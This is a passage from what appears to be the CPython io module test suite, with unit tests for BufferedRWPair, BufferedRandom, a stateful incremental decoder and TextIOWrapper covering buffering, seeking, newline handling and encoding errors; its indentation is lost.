self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data.tobytes(), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
class CBufferedRandomTest(CBufferedReaderTest, CBufferedWriterTest,
BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
@support.impl_detail(cpython=True)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), u'')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with support.check_py3k_warnings():
self.TextIOWrapper(b, encoding="hex_codec")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=u'dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super(MyTextIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyTextIO, self).close()
def flush(self):
record.append(3)
super(MyTextIO, self).flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEqual(s, prefix.decode("ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
